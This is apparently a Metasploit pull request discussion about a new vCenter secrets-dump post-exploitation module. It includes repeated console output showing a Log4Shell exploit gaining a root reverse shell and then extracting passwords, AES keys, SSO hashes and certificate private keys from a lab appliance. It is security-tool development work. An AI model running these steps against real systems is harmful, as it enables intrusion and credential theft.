Add vcenter_secrets_dump post module
This is a rework of #16465 and expands on the work of @npm-cesium137-io, but unfortunately they seem to have gone missing (mainly due to my rework taking a long time). It moves many of the functions to a library and includes a spec so we can track changes and ensure the code is working.
This PR is part of a series of PRs. After this lands, I'll add in @ErikWynter's two modules, but want to get this pushed to master before we start expanding so we have a good base of work to go off of.
This module adds a new post module for vCenter. To test it, you'll want to root a vCenter (I've been using my log4j box for this purpose).
Verification
- [ ] Start `msfconsole`
- [ ] use an exploit to get root on a box, such as `exploit/multi/http/vmware_vcenter_log4shell`
- [ ] `use vcenter_secrets_dump`
- [ ] `set session 1`
- [ ] `run`
- [ ] Verify no errors are encountered
- [ ] Documentation looks good
@ErikWynter @npm-cesium137-io can you all test this module? I suspect there are still some bugs (hence why it's draft) since my vCenter doesn't have any ESXs connected to control, and there are many ways to configure vCenter other than what I have.
Please post (sanitized) output here. I left the docs in their old state until I can finalize everything a bit more.
@msjenkins-r7 test this please.
I'm going to go ahead and open this up. While it isn't 100% finished, I don't have SSO set up and am hoping someone will who can test that portion; it's the last part and I just need to know what the output is from the cmd_exec command to lib it all up. Other than that move, I think the rest is ready to test.
> I don't have SSO set up and am hoping someone will who can test that portion; it's the last part and I just need to know what the output is from the cmd_exec command to lib it all up.
Are we blocked on this? I can't guarantee we'll have an SSO setup for testing, so if we're blocked on that, would it make sense to just omit it for now?
Module will work w/o it, so shouldn't be a blocker.
Updated to address comments. It's been so long I'm not sure if I was getting this error before; will trace it down this week to see if it's in my code or a payload issue.
[*] Dumping vmdir schema to LDIF and storing to loot...
[-] Failed to open file: /tmp/.vsphere.local_20220918213126.tmp: core_channel_open: Operation failed: 1
[!] Unable to retrieve ldif contents
[*] Extracting certificates from vSphere platform ...
[+] VMCA_ROOT key: /home/h00die/.msf4/loot/20220918213127_default_192.168.2.203_vmca_090364.key
[+] VMCA_ROOT cert: /home/h00die/.msf4/loot/20220918213128_default_192.168.2.203_vmca_058942.pem
[!] vmwSTSPrivateKey was not found in vmdir, checking for legacy ssoserverSign key PEM files...
[-] Error processing IdP trusted certificate private key
looks like this was in the previous commit, looking into it still
@h00die thanks for continuing to work on this! Unfortunately I haven't come across a vulnerable instance in quite a while, but next time I do, I'll try to run this one
problem solved, believe ready for review again
just checking in on this, before it falls off the to do list
msf6 exploit(multi/http/vmware_vcenter_log4shell) > run
[*] Started reverse TCP handler on 10.5.135.109:4568
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Using auxiliary/scanner/http/log4shell_scanner as check
[+] 10.5.132.114:443 - Log4Shell found via /websso/SAML2/SSO/vsphere.local?SAMLRequest= (header: X-Forwarded-For) (os: Linux 4.4.228-1.ph1 unknown, architecture: amd64-64) (java: Oracle Corporation_1.8.0_251)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Sleeping 30 seconds for any last LDAP connections
[*] Server stopped.
[+] The target is vulnerable.
[+] Delivering the serialized Java object to execute the payload...
[*] Command shell session 1 opened (10.5.135.109:4568 -> 10.5.132.114:54020) at 2022-10-24 12:11:36 -0500
[*] Server stopped.
id
uid=0(root) gid=0(root) groups=0(root)
^Z
Background session 1? [y/N] y
msf6 exploit(multi/http/vmware_vcenter_log4shell) > use post/linux/gather/vcenter_secrets_dump
msf6 post(linux/gather/vcenter_secrets_dump) > set session 1
session => 1
msf6 post(linux/gather/vcenter_secrets_dump) > set verbose true
verbose => true
msf6 post(linux/gather/vcenter_secrets_dump) > show options
Module options (post/linux/gather/vcenter_secrets_dump):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 1 yes The session to run this module on
Post action:
Name Description
---- -----------
Dump Dump vCenter Secrets
msf6 post(linux/gather/vcenter_secrets_dump) > run
[*] VMware VirtualCenter 6.7.0 build-17028632
[*] vCenter Appliance (Embedded)
[*] Validating target ...
[*] Enumerating universal vSphere binaries ...
[+] ldapsearch: /opt/likewise/bin/ldapsearch
[*] Appliance IPv4: 10.5.132.114
[*] Appliance Hostname: photon-machine.moose
[*] Appliance OS: VMware Photon Linux 1.0-62c543d
[*] Gathering vSphere SSO domain information ...
[*] vSphere Machine ID: be5822f7-2722-446b-b374-9c48a1923c76
[*] vSphere SSO Domain FQDN: vsphere.local
[*] vSphere SSO Domain DN: dc=vsphere,dc=local
[*] Extracting dcAccountDN and dcAccountPassword via lwregshell on local vCenter ...
[+] vSphere SSO DC DN: cn=photon-machine.moose,ou=Domain Controllers,dc=vsphere,dc=local
[+] vSphere SSO DC PW: lUdBq\\EY;B+c"{e5So-r
[*] Extracting tenant and vpx AES encryption key...
[*] vCenter returned a Base64 AES key: LDQ3U1V/XD0rZmg8OUM/bQ==
[+] vSphere Tenant AES encryption
[+] KEY: ,47SU\=+fh<9C?m
[+] HEX: 2c343753557f5c3d2b66683c39433f6d
[+] vSphere vmware-vpx AES encryption
[+] HEX: 904bc531eeb4e3846c6738213e2ad671aaa8c12f6ab35a75a130a6fd8b992e23
[*] Extracting PostgreSQL database credentials ...
[+] VCDB Name: VCDB
[+] VCDB User: vc
[+] VCDB Pass: *Kk5!=FY3pCn)uB9
[*] Extract ESXi host vpxuser credentials ...
[!] No ESXi hosts attached to this vCenter system
[*] Extracting vSphere SSO domain secrets ...
[*] Dumping vmdir schema to LDIF and storing to loot...
[+] LDIF Dump: /home/tmoose/.msf4/loot/20221024122441_default_10.5.132.114_vmdir_498874.ldif
[*] Processing vmdir LDIF (this may take several minutes) ...
[*] Processing LDIF entries ...
[*] Processing SSO account hashes ...
[+] vSphere SSO User Credential: cn=photon-machine.moose,ou=Domain Controllers,dc=vsphere,dc=local:$dynamic_82$909ac122bb4f53952c2d815f63c784f17f5604bbde1dd9241264614f10d3f8c55fa189e78286607ad124feea8d9655c773d81ec6330e750f8535d7bc3b6caae9$HEX$4055d19b919c6c8a6bc96865a8416827
[!] No active DB -- Credential data will not be saved!
[+] vSphere SSO User Credential: CN=waiter 404763bc-2aaf-432d-bcc1-1134b3426dc7,cn=users,dc=vsphere,dc=local:$dynamic_82$f79b19ebf8adde8717cc637a5657691ec56c2e06d582ba1004bbe4e54bfab0741a623047aaeb9490bb5c8867e2a742a5a39705212d12142357665d35848830c7$HEX$d20b641916b4779432fb6573343e9b6e
[+] vSphere SSO User Credential: cn=krbtgt/VSPHERE.LOCAL,cn=users,dc=VSPHERE,dc=LOCAL:$dynamic_82$e240b2eb552b9f9a7c3f8ebb30a3b68533096ab9addb2b189b2eb3fc1435723ac20cc8998d085679cd6397c93d709d76e1ade2ab58e119932c8104857221609b$HEX$601a57286c99e0846385282f7afd4be2
[+] vSphere SSO User Credential: cn=K/M,cn=users,dc=VSPHERE,dc=LOCAL:$dynamic_82$03094aaabcba803d1c4e2694c24065808bee59f3db0e23e43475b95e4d6ed0068d5de48f7502ef827ed4663609f4397ca89d256659908f4f4ddf6a7d9128e609$HEX$24e4fa79a0b65fbd768e95f29e3c3f93
[+] vSphere SSO User Credential: cn=Administrator,cn=Users,dc=vsphere,dc=local:$dynamic_82$055e73b99895cf7ef6560d556eaae7ce537cefcaa73c72d0d2a4564e08610565614d3ad407c8dd940cc0152c4582f3f53a24d1a9744686edf1966ea89e37379f$HEX$476cec1c760a1eab86bb00fc11da2ebf
[+] vSphere SSO User Credential: cn=vmca/[email protected],cn=Managed Service Accounts,dc=vsphere,dc=local:$dynamic_82$44541ee284d439c65840ae08f684fcda6afa5c9f23e2964a933c6ffa540378a55ce162578a9116b2ee675e6b06db788c69c237f267314e6acfa03553df6774eb$HEX$fdd1d5f311ca1909cbd59d62c08318da
[+] vSphere SSO User Credential: cn=ldap/[email protected],cn=Managed Service Accounts,dc=vsphere,dc=local:$dynamic_82$81953e69205ce32ff5ae83ee3113849a3ff8773ef437f4dd9152915f414fde037637f95b529866abd0c87ca373963234a747ac46881f29c9a99ac479759a0c4d$HEX$769f7212f651731e667767350c39c90e
[+] vSphere SSO User Credential: cn=DNS/[email protected],cn=Managed Service Accounts,dc=vsphere,dc=local:$dynamic_82$58cceb892e40e02473f9be913034f86ed0f2f13d2d43fa2895afd0208a9c4e17d32506ce7cbcd03904cfa411a5e02e51e12a8c661526943f97bc1eefba0bcb14$HEX$4712e9c49dee731aa49dbd3c9f3f454f
[+] vSphere SSO User Credential: cn=host/[email protected],cn=Managed Service Accounts,dc=vsphere,dc=local:$dynamic_82$69cb7dd55b1e1e2de1a0881911ad0c0e10f3e7edb545dafcc3fc76d1fb8112c5e749a4346892675bd076976c94076bf6f4fee0cb7beb122d77eea69e2599ad0b$HEX$895786442af879d243b9e72a5e68e8f2
[*] Processing SSO identity sources ...
[*] Found SSO Identity Source Credential:
[+] IDENTITY_STORE_TYPE_VMWARE_DIRECTORY @ ldap://localhost:389:
[+] SSOUSER: [email protected]
[+] SSOPASS: m.pB:fo|\Dj2%CGcUL3[
[+] SSODOMAIN: vsphere.local
[*] Extracting certificates from vSphere platform ...
[*] Extract VMCA_ROOT key ...
[+] VMCA_ROOT key: /home/tmoose/.msf4/loot/20221024122442_default_10.5.132.114_vmca_742773.key
[*] Extract VMCA_ROOT cert ...
[+] VMCA_ROOT cert: /home/tmoose/.msf4/loot/20221024122442_default_10.5.132.114_vmca_566968.pem
[*] Fetching objectclass=vmwSTSTenantCredential via vmdir LDAP ...
[*] Parsing vmwSTSTenantCredential certificates and keys ...
[*] Downloading advertised IDM tenant certificate chain from http://localhost:7080/idm/tenant/ on local vCenter ...
[*] Validated vSphere SSO IdP certificate against vSphere IDM tenant certificate
[+] SSO_STS_IDP key: /home/tmoose/.msf4/loot/20221024122443_default_10.5.132.114_idp_092125.key
[+] SSO_STS_IDP cert: /home/tmoose/.msf4/loot/20221024122443_default_10.5.132.114_idp_845777.pem
[*] Extract MACHINE_SSL_CERT key ...
[+] MACHINE_SSL_CERT Key: /home/tmoose/.msf4/loot/20221024122443_default_10.5.132.114___MACHINE_CERT_346174.key
[*] Extract MACHINE_SSL_CERT certificate ...
[+] MACHINE_SSL_CERT Cert: /home/tmoose/.msf4/loot/20221024122443_default_10.5.132.114___MACHINE_CERT_187599.pem
[*] Extract MACHINE key ...
[+] MACHINE Key: /home/tmoose/.msf4/loot/20221024122444_default_10.5.132.114_machine_089886.key
[*] Extract MACHINE certificate ...
[+] MACHINE Cert: /home/tmoose/.msf4/loot/20221024122444_default_10.5.132.114_machine_123421.pem
[*] Extract VSPHERE-WEBCLIENT key ...
[+] VSPHERE-WEBCLIENT Key: /home/tmoose/.msf4/loot/20221024122444_default_10.5.132.114_vspherewebclien_672781.key
[*] Extract VSPHERE-WEBCLIENT certificate ...
[+] VSPHERE-WEBCLIENT Cert: /home/tmoose/.msf4/loot/20221024122444_default_10.5.132.114_vspherewebclien_063188.pem
[*] Extract VPXD key ...
[+] VPXD Key: /home/tmoose/.msf4/loot/20221024122444_default_10.5.132.114_vpxd_910040.key
[*] Extract VPXD certificate ...
[+] VPXD Cert: /home/tmoose/.msf4/loot/20221024122444_default_10.5.132.114_vpxd_061784.pem
[*] Extract VPXD-EXTENSION key ...
[+] VPXD-EXTENSION Key: /home/tmoose/.msf4/loot/20221024122445_default_10.5.132.114_vpxdextension_701482.key
[*] Extract VPXD-EXTENSION certificate ...
[+] VPXD-EXTENSION Cert: /home/tmoose/.msf4/loot/20221024122445_default_10.5.132.114_vpxdextension_317366.pem
[*] Extract DATA-ENCIPHERMENT key ...
[+] DATA-ENCIPHERMENT Key: /home/tmoose/.msf4/loot/20221024122445_default_10.5.132.114_dataenciphermen_955390.key
[*] Extract DATA-ENCIPHERMENT certificate ...
[+] DATA-ENCIPHERMENT Cert: /home/tmoose/.msf4/loot/20221024122445_default_10.5.132.114_dataenciphermen_886266.pem
[*] Extract SMS key ...
[+] SMS Key: /home/tmoose/.msf4/loot/20221024122446_default_10.5.132.114_sms_self_signed_127498.key
[*] Extract SMS certificate ...
[+] SMS Cert: /home/tmoose/.msf4/loot/20221024122446_default_10.5.132.114_sms_self_signed_611042.pem
[*] Searching for secrets in VM Guest Customization Specification XML ...
[!] No vpx_customization_spec entries evident
[*] Post module execution completed
> just checking in on this, before it falls off the to do list
https://github.com/rapid7/metasploit-framework/pull/16871#discussion_r972264964 looks still unresponded/unresolved.
good catch, the gui was hiding that from me. merged, tested, uploaded.
msf6 exploit(multi/http/vmware_vcenter_log4shell) > run
[*] Started reverse TCP handler on 10.5.135.109:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Using auxiliary/scanner/http/log4shell_scanner as check
[+] 10.5.132.114:443 - Log4Shell found via /websso/SAML2/SSO/vsphere.local?SAMLRequest= (header: X-Forwarded-For) (os: Linux 4.4.228-1.ph1 unknown, architecture: amd64-64) (java: Oracle Corporation_1.8.0_251)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Sleeping 30 seconds for any last LDAP connections
[*] Server stopped.
[+] The target is vulnerable.
[+] Delivering the serialized Java object to execute the payload...
[*] Command shell session 1 opened (10.5.135.109:4444 -> 10.5.132.114:57164) at 2022-10-27 10:53:23 -0500
[*] Server stopped.
id
uid=0(root) gid=0(root) groups=0(root)
^Z
Background session 1? [y/N] y
msf6 exploit(multi/http/vmware_vcenter_log4shell) > use post/linux/gather/vcenter_secrets_dump
msf6 post(linux/gather/vcenter_secrets_dump) > show options
Module options (post/linux/gather/vcenter_secrets_dump):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on
Post action:
Name Description
---- -----------
Dump Dump vCenter Secrets
msf6 post(linux/gather/vcenter_secrets_dump) > set session 1
session => 1
msf6 post(linux/gather/vcenter_secrets_dump) > set verbose true
verbose => true
msf6 post(linux/gather/vcenter_secrets_dump) > run
[*] VMware VirtualCenter 6.7.0 build-17028632
[*] vCenter Appliance (Embedded)
[*] Validating target ...
[*] Enumerating universal vSphere binaries ...
[+] ldapsearch: /opt/likewise/bin/ldapsearch
[*] Appliance IPv4: 10.5.132.114
[*] Appliance Hostname: photon-machine.moose
[*] Appliance OS: VMware Photon Linux 1.0-62c543d
[*] Gathering vSphere SSO domain information ...
[*] vSphere Machine ID: be5822f7-2722-446b-b374-9c48a1923c76
[*] vSphere SSO Domain FQDN: vsphere.local
[*] vSphere SSO Domain DN: dc=vsphere,dc=local
[*] Extracting dcAccountDN and dcAccountPassword via lwregshell on local vCenter ...
[+] vSphere SSO DC DN: cn=photon-machine.moose,ou=Domain Controllers,dc=vsphere,dc=local
[+] vSphere SSO DC PW: lUdBq\\EY;B+c"{e5So-r
[*] Extracting tenant and vpx AES encryption key...
[*] vCenter returned a Base64 AES key: LDQ3U1V/XD0rZmg8OUM/bQ==
[+] vSphere Tenant AES encryption
[+] KEY: ,47SU\=+fh<9C?m
[+] HEX: 2c343753557f5c3d2b66683c39433f6d
[+] vSphere vmware-vpx AES encryption
[+] HEX: 904bc531eeb4e3846c6738213e2ad671aaa8c12f6ab35a75a130a6fd8b992e23
[*] Extracting PostgreSQL database credentials ...
[+] VCDB Name: VCDB
[+] VCDB User: vc
[+] VCDB Pass: *Kk5!=FY3pCn)uB9
[*] Extract ESXi host vpxuser credentials ...
[!] No ESXi hosts attached to this vCenter system
[*] Extracting vSphere SSO domain secrets ...
[*] Dumping vmdir schema to LDIF and storing to loot...
[+] LDIF Dump: /home/tmoose/.msf4/loot/20221027110049_default_10.5.132.114_vmdir_949273.ldif
[*] Processing vmdir LDIF (this may take several minutes) ...
[*] Processing LDIF entries ...
[*] Processing SSO account hashes ...
[+] vSphere SSO User Credential: cn=photon-machine.moose,ou=Domain Controllers,dc=vsphere,dc=local:$dynamic_82$909ac122bb4f53952c2d815f63c784f17f5604bbde1dd9241264614f10d3f8c55fa189e78286607ad124feea8d9655c773d81ec6330e750f8535d7bc3b6caae9$HEX$4055d19b919c6c8a6bc96865a8416827
[!] No active DB -- Credential data will not be saved!
[+] vSphere SSO User Credential: CN=waiter 404763bc-2aaf-432d-bcc1-1134b3426dc7,cn=users,dc=vsphere,dc=local:$dynamic_82$f79b19ebf8adde8717cc637a5657691ec56c2e06d582ba1004bbe4e54bfab0741a623047aaeb9490bb5c8867e2a742a5a39705212d12142357665d35848830c7$HEX$d20b641916b4779432fb6573343e9b6e
[+] vSphere SSO User Credential: cn=krbtgt/VSPHERE.LOCAL,cn=users,dc=VSPHERE,dc=LOCAL:$dynamic_82$e240b2eb552b9f9a7c3f8ebb30a3b68533096ab9addb2b189b2eb3fc1435723ac20cc8998d085679cd6397c93d709d76e1ade2ab58e119932c8104857221609b$HEX$601a57286c99e0846385282f7afd4be2
[+] vSphere SSO User Credential: cn=K/M,cn=users,dc=VSPHERE,dc=LOCAL:$dynamic_82$03094aaabcba803d1c4e2694c24065808bee59f3db0e23e43475b95e4d6ed0068d5de48f7502ef827ed4663609f4397ca89d256659908f4f4ddf6a7d9128e609$HEX$24e4fa79a0b65fbd768e95f29e3c3f93
[+] vSphere SSO User Credential: cn=Administrator,cn=Users,dc=vsphere,dc=local:$dynamic_82$055e73b99895cf7ef6560d556eaae7ce537cefcaa73c72d0d2a4564e08610565614d3ad407c8dd940cc0152c4582f3f53a24d1a9744686edf1966ea89e37379f$HEX$476cec1c760a1eab86bb00fc11da2ebf
[+] vSphere SSO User Credential: cn=vmca/[email protected],cn=Managed Service Accounts,dc=vsphere,dc=local:$dynamic_82$44541ee284d439c65840ae08f684fcda6afa5c9f23e2964a933c6ffa540378a55ce162578a9116b2ee675e6b06db788c69c237f267314e6acfa03553df6774eb$HEX$fdd1d5f311ca1909cbd59d62c08318da
[+] vSphere SSO User Credential: cn=ldap/[email protected],cn=Managed Service Accounts,dc=vsphere,dc=local:$dynamic_82$81953e69205ce32ff5ae83ee3113849a3ff8773ef437f4dd9152915f414fde037637f95b529866abd0c87ca373963234a747ac46881f29c9a99ac479759a0c4d$HEX$769f7212f651731e667767350c39c90e
[+] vSphere SSO User Credential: cn=DNS/[email protected],cn=Managed Service Accounts,dc=vsphere,dc=local:$dynamic_82$58cceb892e40e02473f9be913034f86ed0f2f13d2d43fa2895afd0208a9c4e17d32506ce7cbcd03904cfa411a5e02e51e12a8c661526943f97bc1eefba0bcb14$HEX$4712e9c49dee731aa49dbd3c9f3f454f
[+] vSphere SSO User Credential: cn=host/[email protected],cn=Managed Service Accounts,dc=vsphere,dc=local:$dynamic_82$69cb7dd55b1e1e2de1a0881911ad0c0e10f3e7edb545dafcc3fc76d1fb8112c5e749a4346892675bd076976c94076bf6f4fee0cb7beb122d77eea69e2599ad0b$HEX$895786442af879d243b9e72a5e68e8f2
[*] Processing SSO identity sources ...
[*] Found SSO Identity Source Credential:
[+] IDENTITY_STORE_TYPE_VMWARE_DIRECTORY @ ldap://localhost:389:
[+] SSOUSER: [email protected]
[+] SSOPASS: m.pB:fo|\Dj2%CGcUL3[
[+] SSODOMAIN: vsphere.local
[*] Extracting certificates from vSphere platform ...
[*] Extract VMCA_ROOT key ...
[+] VMCA_ROOT key: /home/tmoose/.msf4/loot/20221027110050_default_10.5.132.114_vmca_128689.key
[*] Extract VMCA_ROOT cert ...
[+] VMCA_ROOT cert: /home/tmoose/.msf4/loot/20221027110050_default_10.5.132.114_vmca_979914.pem
[*] Fetching objectclass=vmwSTSTenantCredential via vmdir LDAP ...
[*] Parsing vmwSTSTenantCredential certificates and keys ...
[*] Downloading advertised IDM tenant certificate chain from http://localhost:7080/idm/tenant/ on local vCenter ...
[*] Validated vSphere SSO IdP certificate against vSphere IDM tenant certificate
[+] SSO_STS_IDP key: /home/tmoose/.msf4/loot/20221027110050_default_10.5.132.114_idp_766703.key
[+] SSO_STS_IDP cert: /home/tmoose/.msf4/loot/20221027110050_default_10.5.132.114_idp_956011.pem
[*] Extract MACHINE_SSL_CERT key ...
[+] MACHINE_SSL_CERT Key: /home/tmoose/.msf4/loot/20221027110051_default_10.5.132.114___MACHINE_CERT_931284.key
[*] Extract MACHINE_SSL_CERT certificate ...
[+] MACHINE_SSL_CERT Cert: /home/tmoose/.msf4/loot/20221027110051_default_10.5.132.114___MACHINE_CERT_492725.pem
[*] Extract MACHINE key ...
[+] MACHINE Key: /home/tmoose/.msf4/loot/20221027110052_default_10.5.132.114_machine_948197.key
[*] Extract MACHINE certificate ...
[+] MACHINE Cert: /home/tmoose/.msf4/loot/20221027110052_default_10.5.132.114_machine_946055.pem
[*] Extract VSPHERE-WEBCLIENT key ...
[+] VSPHERE-WEBCLIENT Key: /home/tmoose/.msf4/loot/20221027110052_default_10.5.132.114_vspherewebclien_601663.key
[*] Extract VSPHERE-WEBCLIENT certificate ...
[+] VSPHERE-WEBCLIENT Cert: /home/tmoose/.msf4/loot/20221027110052_default_10.5.132.114_vspherewebclien_043993.pem
[*] Extract VPXD key ...
[+] VPXD Key: /home/tmoose/.msf4/loot/20221027110052_default_10.5.132.114_vpxd_210288.key
[*] Extract VPXD certificate ...
[+] VPXD Cert: /home/tmoose/.msf4/loot/20221027110052_default_10.5.132.114_vpxd_029440.pem
[*] Extract VPXD-EXTENSION key ...
[+] VPXD-EXTENSION Key: /home/tmoose/.msf4/loot/20221027110052_default_10.5.132.114_vpxdextension_414011.key
[*] Extract VPXD-EXTENSION certificate ...
[+] VPXD-EXTENSION Cert: /home/tmoose/.msf4/loot/20221027110052_default_10.5.132.114_vpxdextension_483742.pem
[*] Extract DATA-ENCIPHERMENT key ...
[+] DATA-ENCIPHERMENT Key: /home/tmoose/.msf4/loot/20221027110053_default_10.5.132.114_dataenciphermen_605774.key
[*] Extract DATA-ENCIPHERMENT certificate ...
[+] DATA-ENCIPHERMENT Cert: /home/tmoose/.msf4/loot/20221027110053_default_10.5.132.114_dataenciphermen_742464.pem
[*] Extract SMS key ...
[+] SMS Key: /home/tmoose/.msf4/loot/20221027110053_default_10.5.132.114_sms_self_signed_644974.key
[*] Extract SMS certificate ...
[+] SMS Cert: /home/tmoose/.msf4/loot/20221027110053_default_10.5.132.114_sms_self_signed_021024.pem
[*] Searching for secrets in VM Guest Customization Specification XML ...
[!] No vpx_customization_spec entries evident
[*] Post module execution completed
Release Notes
Add post/linux/gather module to dump vCenter vmdir dcAccountPassword and platform certificates.
@npm-cesium137-io just wanted to make sure you saw this landed to framework. Sorry it took so long! @ErikWynter I'll start working on the database portion soon!
@h00die congrats! feel free to ping me if you have any questions about the db stuff or run into anything weird
@HynekPetrak these are really good issues/things to bring up. Can you start an issue and tag me on it so they don't get lost on this already merged module? I'll either add the updates to #17214 or PR them up if that one lands before I can get to these.
> @npm-cesium137-io just wanted to make sure you saw this landed to framework. Sorry it took so long! @ErikWynter I'll start working on the database portion soon!
Hi, I'm amazed that you were able to whip that, uhm, comprehensive pile of code I plopped here into something workable, can't wait to try it out! P.S. trying to deal with all the shell escaping for bind / DB passwords shaved years off my life, too, IKTF.